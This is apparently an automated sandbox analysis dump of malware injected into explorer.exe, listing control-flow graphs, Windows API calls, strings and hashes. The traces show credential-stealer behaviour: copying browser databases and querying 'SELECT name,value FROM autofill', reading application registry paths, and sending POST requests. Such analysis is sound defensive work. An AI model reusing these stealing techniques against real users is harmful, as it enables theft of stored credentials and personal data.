                                  control_flow_graph 206 83c40-83c52 call 81b6a 209 83c58-83c95 call 81000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW call d4bec 206->209 210 83dfa-83e01 206->210 214 83c9a-83c9c 209->214 215 83dec-83df5 DeleteFileW call 81011 214->215 216 83ca2-83cba call beeb8 214->216 215->210 220 83cc0-83cdf call 81000 call a02ec 216->220 221 83de3-83de7 call d3848 216->221 227 83d9f-83da2 220->227 221->215 228 83da8-83db7 call 9fb92 lstrlen 227->228 229 83ce4-83cfa call 81fa7 227->229 236 83db9-83dd7 call 81798 * 3 228->236 237 83ddc-83dde call 81011 228->237 234 83d08-83d1d call 81fa7 229->234 235 83cfc-83d02 229->235 244 83d2b-83d33 lstrlen 234->244 245 83d1f-83d25 234->245 235->234 239 83d04 235->239 236->237 237->221 239->234 249 83d35-83d3a lstrlen 244->249 250 83d96-83d9a call a02ec 244->250 245->244 248 83d27 245->248 248->244 249->250 253 83d3c-83d6f call 81000 wsprintfA lstrlen 249->253 250->227 256 83d71-83d81 call 8102f 253->256 257 83d83-83d91 lstrcat call 81011 253->257 256->257 257->250
                                  APIs
                                    • Part of subcall function 00081B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00081B82
                                    • Part of subcall function 00081B6A: CloseHandle.KERNEL32(00000000), ref: 00081B8F
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • GetTempPathW.KERNEL32(00000104,00000000), ref: 00083C6A
                                  • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00083C76
                                  • DeleteFileW.KERNEL32(00000000), ref: 00083C7D
                                  • CopyFileW.KERNEL32(?,00000000,00000000), ref: 00083C89
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 00083D2F
                                  • lstrlen.KERNEL32(00000000), ref: 00083D36
                                  • wsprintfA.USER32 ref: 00083D55
                                  • lstrlen.KERNEL32(00000000), ref: 00083D61
                                  • lstrcat.KERNEL32(00000000,?), ref: 00083D89
                                  • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 00083DB2
                                  • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 00083DED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                  • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                  • API String ID: 2923052733-3488123210
                                  • Opcode ID: 156d9d91afbf66ab9bacdf8f621a9befe06fdc2544cda769dd44be048fcfa586
                                  • Instruction ID: 5fc246d5280d0b4c4e5f44c9b136f416c62594648c96d7d0805e589a6c6bd98a
                                  • Opcode Fuzzy Hash: 156d9d91afbf66ab9bacdf8f621a9befe06fdc2544cda769dd44be048fcfa586
                                  • Instruction Fuzzy Hash: 1A416A31204341ABD711BB64DC81ABF7BEDBFC5744F004829F986A6253DA2ADD028B62

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 418 81333-81385 call 81000 call 8106c call 812a3 425 813a0-813a3 418->425 426 81387-8139e 418->426 428 813aa-813ac 425->428 429 813b0-813b2 426->429 428->429 430 813b8-813ef RtlZeroMemory 429->430 431 815cb-815da call 81011 429->431 435 815c3-815ca 430->435 436 813f5-8141a 430->436 435->431 439 815bf 436->439 440 81420-81456 call 810b1 436->440 439->435 443 81458 440->443 444 8145d-81478 440->444 443->444 446 8147e-81483 444->446 447 815b5 444->447 448 8149d-814c7 call 81000 wsprintfW 446->448 449 81485-81496 446->449 447->439 452 814c9-814cb 448->452 453 814e0-81509 448->453 449->448 454 814cc-814cf 452->454 460 8150f-8151b 453->460 461 815a5-815b0 call 81011 453->461 455 814da-814dc 454->455 456 814d1-814d6 454->456 455->453 456->454 458 814d8 456->458 458->453 460->461 465 81521-81537 call 81000 460->465 461->447 468 81539-81544 465->468 469 81558-8156f 468->469 470 81546-81553 call 8102f 468->470 474 81571 469->474 475 81573-8157d 469->475 470->469 474->475 475->468 476 8157f-81583 475->476 477 8159a-815a1 call 81011 476->477 478 81585 call 8104c 476->478 477->461 482 8158a-81594 RtlMoveMemory 478->482 482->477
                                  APIs
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • Part of subcall function 0008106C: lstrlen.KERNEL32(008FB176,00000000,00000000,00000000,00081366,75712B62,008FB176,00000000), ref: 00081074
                                    • Part of subcall function 0008106C: MultiByteToWideChar.KERNEL32(00000000,00000000,008FB176,00000001,00000000,00000000), ref: 00081086
                                    • Part of subcall function 000812A3: RtlZeroMemory.NTDLL(?,00000018), ref: 000812B5
                                  • RtlZeroMemory.NTDLL(?,0000003C), ref: 000813C2
                                  • wsprintfW.USER32 ref: 000814B5
                                  • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00081594
                                  Strings
                                  • Accept: */*Referer: %S, xrefs: 000814AF
                                  • Content-Type: application/x-www-form-urlencoded, xrefs: 000814FB
                                  • POST, xrefs: 00081465
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                  • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                  • API String ID: 3833683434-704803497
                                  • Opcode ID: 830c9e34ae569718e1b24a9443c08e33e059627cae808b8f3f1a54efc27655ce
                                  • Instruction ID: 7d30e111299667a329711f4808220047800665f4415cfff5e0d1aa668d8bc341
                                  • Opcode Fuzzy Hash: 830c9e34ae569718e1b24a9443c08e33e059627cae808b8f3f1a54efc27655ce
                                  • Instruction Fuzzy Hash: 7D718A74608301AFD750AF24DC84AABBBEDFF88344F04092EF995C3252DB75D9058BA2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 483 8a40e-8a424 484 8a4a2-8a4aa 483->484 485 8a426-8a42a 483->485 488 8a4ae-8a4c8 484->488 486 8a42c-8a42f 485->486 487 8a431-8a441 485->487 486->484 486->487 489 8a469-8a4a0 memcpy 487->489 490 8a443 487->490 491 8a4cc-8a4d8 488->491 489->488 492 8a44a-8a45a memcpy 490->492 493 8a445-8a448 490->493 494 8a4e1-8a4e3 491->494 495 8a45d 492->495 493->489 493->492 496 8a524-8a538 call 8a2aa 494->496 497 8a4e5-8a4ee 494->497 498 8a45f-8a466 495->498 496->495 503 8a53e-8a553 memset 496->503 497->496 502 8a4f0-8a4ff call 8a250 497->502 502->491 506 8a501-8a51f call 8a1c6 502->506 503->498 506->498
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: memcpy$FileReadmemset
                                  • String ID: winRead$S
                                  • API String ID: 2051157613-3859733311
                                  • Opcode ID: bde34e08940a5130dac1807a5a62c036b30e63eb355d3be97c081e77bc4c7292
                                  • Instruction ID: a448c403023d706c5321a739c0c01a4e33aea86af15eac139fec1e7941e37ac6
                                  • Opcode Fuzzy Hash: bde34e08940a5130dac1807a5a62c036b30e63eb355d3be97c081e77bc4c7292
                                  • Instruction Fuzzy Hash: 4B318D72705340ABEB50EE18CC8599F77E6FFC5350F84692AF98597611D670EC048B93

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 535 8b87b-8b88a 536 8b88d-8b8e3 memset 535->536 537 8b903 536->537 538 8b8e5-8b8f3 call 8b64b 536->538 539 8b905-8b914 call 8b609 537->539 543 8b8f9-8b901 538->543 544 8baf3-8baf9 538->544 546 8b91a-8b923 call 8b828 539->546 547 8bae3 539->547 543->539 553 8b929-8b941 546->553 554 8bad6-8bae1 call 868ec 546->554 549 8bae8-8baf1 call 868ec 547->549 549->544 555 8b943-8b944 553->555 556 8b946-8b94d 553->556 554->549 558 8b950-8b962 555->558 556->558 560 8b965-8b96e 558->560 561 8b975-8b97c 560->561 562 8b9cb-8b9e4 call 8a2aa 561->562 563 8b97e-8b983 561->563 572 8ba41-8ba46 562->572 573 8b9e6-8b9fd call 868ec * 2 562->573 564 8b985-8b9aa call 86614 call 8bb9f call 86620 563->564 565 8b9b6-8b9c9 call 8a250 563->565 590 8b9ac-8b9b0 564->590 591 8b9b2 564->591 565->560 565->562 576 8ba48-8ba52 572->576 577 8ba54-8ba6e call 868ec * 2 572->577 588 8b9ff-8ba04 573->588 589 8ba14-8ba3c call 8a1c6 call d4db2 573->589 576->577 592 8ba70-8ba72 577->592 593 8ba74 577->593 588->589 594 8ba06-8ba0f 588->594 589->544 590->562 590->591 591->565 596 8ba79-8ba8a 592->596 593->596 594->536 598 8ba8c 596->598 599 8ba90-8baa2 call d52ae 596->599 598->599 604 8baa8-8bad4 599->604 605 8baa4 599->605 604->544 605->604
                                  APIs
                                  • memset.NTDLL ref: 0008B8D5
                                  • CreateFileW.KERNELBASE(00000000,?,00000003,00000000,-00000003,?,00000000), ref: 0008B96F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateFilememset
                                  • String ID: psow$winOpen$S
                                  • API String ID: 2416746761-2586101589
                                  • Opcode ID: 12164cb21f261cdadd353abf1e934a4ba790bd36f114a5547278b584b4ed5aa7
                                  • Instruction ID: abee809fe31a5a6538aaceb5af34820908a67b249fbf2f2df2ee654d3b299c62
                                  • Opcode Fuzzy Hash: 12164cb21f261cdadd353abf1e934a4ba790bd36f114a5547278b584b4ed5aa7
                                  • Instruction Fuzzy Hash: 53718D71A04702DFD750EF28C88175ABBE0FF88724F104A29F9E8A7292D774D954CB92

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 606 82e30-82e55 StrStrIW 607 82ebe-82eec call 81000 RegOpenKeyExW 606->607 608 82e57-82e6c call 819e5 606->608 615 82f68-82f74 call 81011 607->615 616 82eee-82efd 607->616 613 82ebc 608->613 614 82e6e-82e79 call 81bc5 608->614 613->607 624 82e7b-82e85 call 81afe 614->624 625 82eb5-82eb7 call 81011 614->625 619 82f50-82f5c RegEnumKeyExW 616->619 622 82f5e-82f62 RegCloseKey 619->622 623 82eff-82f26 call 81953 call 8199d call 82e30 619->623 622->615 639 82f2b-82f4f call 81011 623->639 632 82eae-82eb0 call 81011 624->632 633 82e87-82e97 call 8199d 624->633 625->613 632->625 633->632 640 82e99-82ea0 call 82c77 633->640 639->619 640->632
                                  APIs
                                  • StrStrIW.SHLWAPI(?,?), ref: 00082E4B
                                  • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 00082EE4
                                  • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00082F54
                                  • RegCloseKey.KERNEL32(?), ref: 00082F62
                                    • Part of subcall function 000819E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A1E
                                    • Part of subcall function 000819E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A3C
                                    • Part of subcall function 000819E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A75
                                    • Part of subcall function 000819E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A98
                                    • Part of subcall function 00081BC5: lstrlenW.KERNEL32(00000000,00000000,?,00082E75,PathToExe,00000000,00000000), ref: 00081BCC
                                    • Part of subcall function 00081BC5: StrStrIW.SHLWAPI(00000000,.exe), ref: 00081BF0
                                    • Part of subcall function 00081BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 00081C05
                                    • Part of subcall function 00081BC5: lstrlenW.KERNEL32(00000000,?,00082E75,PathToExe,00000000,00000000), ref: 00081C1C
                                    • Part of subcall function 00081AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00081B16
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                  • String ID: PathToExe
                                  • API String ID: 1799103994-1982016430
                                  • Opcode ID: 176bef6c441af3b74209ea396fc40097f656177413e2de5b0ffeb482d9c6ff9b
                                  • Instruction ID: 737ea95267dbba0b38d2cc2ed97825fc8b79697e55c450d9c33e4e3cb90f41d0
                                  • Opcode Fuzzy Hash: 176bef6c441af3b74209ea396fc40097f656177413e2de5b0ffeb482d9c6ff9b
                                  • Instruction Fuzzy Hash: D4317A71604211AF9B15AF21CC159AF7AEAFFC4350B04852DF89987282EE75C902DBA1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 644 84a71-84acf call 81000 wsprintfW RegCreateKeyExW 647 84ad1-84add RegCloseKey 644->647 648 84ae6-84af5 call 81011 644->648 647->648 649 84adf-84ae3 647->649 649->648
                                  APIs
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • wsprintfW.USER32 ref: 00084AA2
                                  • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00084AC7
                                  • RegCloseKey.ADVAPI32(?), ref: 00084AD4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                  • String ID: %s\%08x$Software
                                  • API String ID: 1800864259-1658101971
                                  • Opcode ID: 45d3ed723e8728aaf1a2cd76e0cfc109dc4998e35e31a87ae645a26b94ee33a0
                                  • Instruction ID: 5840dc6503cc108a31221738e39441bd1e23fba901afdc883f4ef9a0ed6d19d0
                                  • Opcode Fuzzy Hash: 45d3ed723e8728aaf1a2cd76e0cfc109dc4998e35e31a87ae645a26b94ee33a0
                                  • Instruction Fuzzy Hash: A8012B71601108BFE7189F54DC8AEFF7BADEB44344F40016FF905A3141D6B26D409671

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 652 84317-8433d _alloca_probe RegOpenKeyW 653 843cf-843d6 652->653 654 84343-8436b RegEnumKeyExW 652->654 655 8436d 654->655 656 843c4-843ce RegCloseKey 654->656 657 8436e-843c1 call 81953 call 8199d call 8418a call 81011 RegEnumKeyExW 655->657 656->653 666 843c3 657->666 666->656
                                  APIs
                                  • _alloca_probe.NTDLL ref: 0008431C
                                  • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 00084335
                                  • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00084363
                                  • RegCloseKey.ADVAPI32(?), ref: 000843C8
                                    • Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                    • Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                    • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                    • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                    • Part of subcall function 0008418A: wsprintfW.USER32 ref: 00084212
                                    • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
                                    • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                  • RegEnumKeyExW.KERNEL32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000843B9
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: EnumHeaplstrcatlstrlen$CloseFreeOpenProcess_alloca_probewsprintf
                                  • String ID:
                                  • API String ID: 801677237-0
                                  • Opcode ID: 94190413aac87ea3199495c5d956d1a7f457b02da9cdaf68acba56015df3a036
                                  • Instruction ID: b5ac95aea56f536f4b5c73fd8efd5d921aaf08e2ac68ca3006de1c18578d18ae
                                  • Opcode Fuzzy Hash: 94190413aac87ea3199495c5d956d1a7f457b02da9cdaf68acba56015df3a036
                                  • Instruction Fuzzy Hash: A9112EB1104201BFE715AB10DC49DFB7BEDFB88344F00452EF889D2151EA799E499B72

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 742 819e5-819f5 743 819fa-81a26 RegOpenKeyExW 742->743 744 819f7 742->744 745 81a28-81a44 RegQueryValueExW 743->745 746 81aa2-81aa7 743->746 744->743 749 81a94-81aa0 RegCloseKey 745->749 750 81a46-81a4c 745->750 747 81aa9-81ab9 call 819e5 746->747 748 81abb 746->748 752 81abd-81ac3 747->752 748->752 749->746 749->748 750->749 753 81a4e-81a53 750->753 755 81a5a-81a7d call 81000 RegQueryValueExW 753->755 756 81a55-81a58 753->756 759 81a8b-81a92 call 81011 755->759 760 81a7f-81a81 755->760 756->749 756->755 759->749 760->749 762 81a83-81a89 760->762 762->749
                                  APIs
                                  • RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A1E
                                  • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A3C
                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A75
                                  • RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A98
                                    • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
                                    • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: HeapQueryValue$CloseFreeOpenProcess
                                  • String ID:
                                  • API String ID: 217796345-0
                                  • Opcode ID: cbca13c41e6ad2c3ad6aba8c637af935e3bc4f0f4e53dd87436683ca29ff9f23
                                  • Instruction ID: c5571b0ed83ab8e9de6be7d93e5e899f2560c22a91db0528a38c0e6b8d46ffb2
                                  • Opcode Fuzzy Hash: cbca13c41e6ad2c3ad6aba8c637af935e3bc4f0f4e53dd87436683ca29ff9f23
                                  • Instruction Fuzzy Hash: 92217E7220A2416FE7289A21CD04FBBBBEDFFC8B54F040A2DF9D592151E625CD428722
                                  APIs
                                  • RegOpenKeyW.ADVAPI32(?,?,?), ref: 00081ED5
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081F0C
                                  • RegCloseKey.ADVAPI32(?), ref: 00081F98
                                    • Part of subcall function 00081953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,00082F0C), ref: 00081973
                                    • Part of subcall function 00081953: lstrlenW.KERNEL32(000D6564,?,?,00082F0C), ref: 00081978
                                    • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,?), ref: 00081990
                                    • Part of subcall function 00081953: lstrcatW.KERNEL32(00000000,000D6564), ref: 00081994
                                  • RegEnumKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00081F82
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: EnumHeaplstrcatlstrlen$AllocateCloseOpenProcess
                                  • String ID:
                                  • API String ID: 1077800024-0
                                  • Opcode ID: 7b9333fcc51c797b5218fbb23d2e6c6254682b66609f70ce016f7fe61c2493e6
                                  • Instruction ID: 4f23505752de744da42dfdbb6d717c3d1c776ca37b4fc414fa7c845c11fa981a
                                  • Opcode Fuzzy Hash: 7b9333fcc51c797b5218fbb23d2e6c6254682b66609f70ce016f7fe61c2493e6
                                  • Instruction Fuzzy Hash: 7D214F712083016FD705AB21DC45EAB7BEDFF88344F00492DF8D992152DB75C9069B61
                                  APIs
                                  • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00081C46
                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,?,00083FA8), ref: 00081C56
                                  • CloseHandle.KERNEL32(00000000), ref: 00081C91
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 00081C76
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                  • String ID:
                                  • API String ID: 2517252058-0
                                  • Opcode ID: 58ece550bef03a12f2c8c95344160bdb53c7dc2287bfa5caa7a1e707ffd5121a
                                  • Instruction ID: 222b11b4eaba821b6a78fa1be4fe8e728b09ea9ad0825c6bb9d4c4a76c9ad33d
                                  • Opcode Fuzzy Hash: 58ece550bef03a12f2c8c95344160bdb53c7dc2287bfa5caa7a1e707ffd5121a
                                  • Instruction Fuzzy Hash: E7F028312012187BD2202B26DC88EBB7F9CEF467F6F15031AF905931D1DB576C024670
                                  APIs
                                    • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
                                    • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 00082EE4
                                  • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00082F54
                                  • RegCloseKey.KERNEL32(?), ref: 00082F62
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Heap$Process$AllocateCloseEnumFreeOpen
                                  • String ID:
                                  • API String ID: 1066184869-0
                                  • Opcode ID: 2ad7e6767ee96b79d21ba100cb8b695183dda1ff5abafa8c65141433d0a563cb
                                  • Instruction ID: eb41579e80b7c950b35f1486a4d2b204f65a8b7140ff6c4f8f4aa4cb4ca9842d
                                  • Opcode Fuzzy Hash: 2ad7e6767ee96b79d21ba100cb8b695183dda1ff5abafa8c65141433d0a563cb
                                  • Instruction Fuzzy Hash: C5016231205250AB9715BF21DC05EEF7FADFFC4351F00442DF99992192DA758846EFA1
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: ExitInitializeProcessUninitialize
                                  • String ID:
                                  • API String ID: 4175140541-0
                                  • Opcode ID: 518c430dfff4d9d4c723df7a32eae010c3fc126e0e84deb4cb3f28f6201afda5
                                  • Instruction ID: c567147c66812ba5e2ac9ba65c59c1b167aaf398ae84f332e5484db75709233c
                                  • Opcode Fuzzy Hash: 518c430dfff4d9d4c723df7a32eae010c3fc126e0e84deb4cb3f28f6201afda5
                                  • Instruction Fuzzy Hash: B2C09B343465014BF6C03BF05C0D7193758BF00757F045013FA45CA091DF5644008B33
                                  APIs
                                  • HeapCreate.KERNELBASE(00000000,00BD0000,00000000), ref: 00089FF8
                                  Strings
                                  • failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu, xrefs: 0008A00E
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateHeap
                                  • String ID: failed to HeapCreate (%lu), flags=%u, initSize=%lu, maxSize=%lu
                                  • API String ID: 10892065-982776804
                                  • Opcode ID: 1e6db2da140d01e1a68dfa4cea175d4ba005d2fcd999c214ed22800c6a33e8df
                                  • Instruction ID: de4c9e21946e3b268851ec9f55ea6e7eb272948646484cd6e4629a4b53bf34a6
                                  • Opcode Fuzzy Hash: 1e6db2da140d01e1a68dfa4cea175d4ba005d2fcd999c214ed22800c6a33e8df
                                  • Instruction Fuzzy Hash: CCF0F672704381BAF7313A549C88F7B679CFB95B85F24043AFAC5E6241E670AC408731
                                  APIs
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,?,000811C7,?,?,00000001,00000000,?), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 00081B16
                                    • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,?,00081A92,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2), ref: 00081020
                                    • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                    • Part of subcall function 000819E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A1E
                                    • Part of subcall function 000819E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A3C
                                    • Part of subcall function 000819E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 00081A75
                                    • Part of subcall function 000819E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00081AE2,PortNumber,00000000,00000000), ref: 00081A98
                                  Strings
                                  • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00081B40
                                  Memory Dump Source
                                  • Source File: 00000012.00000002.533448482.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_18_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Heap$ProcessQueryValue$AllocateCloseFolderFreeOpenPath
                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                  • API String ID: 2162223993-2036018995
                                  • Opcode ID: d8da52ebf54bab53ae3ca41385c84507770efb2167d087fcb706d6c52b73b34a
                                  • Instruction ID: 337aa3add9a7764b0e93f6c42cfcb22d188dfd0b15f865120cd01d535eb4066c
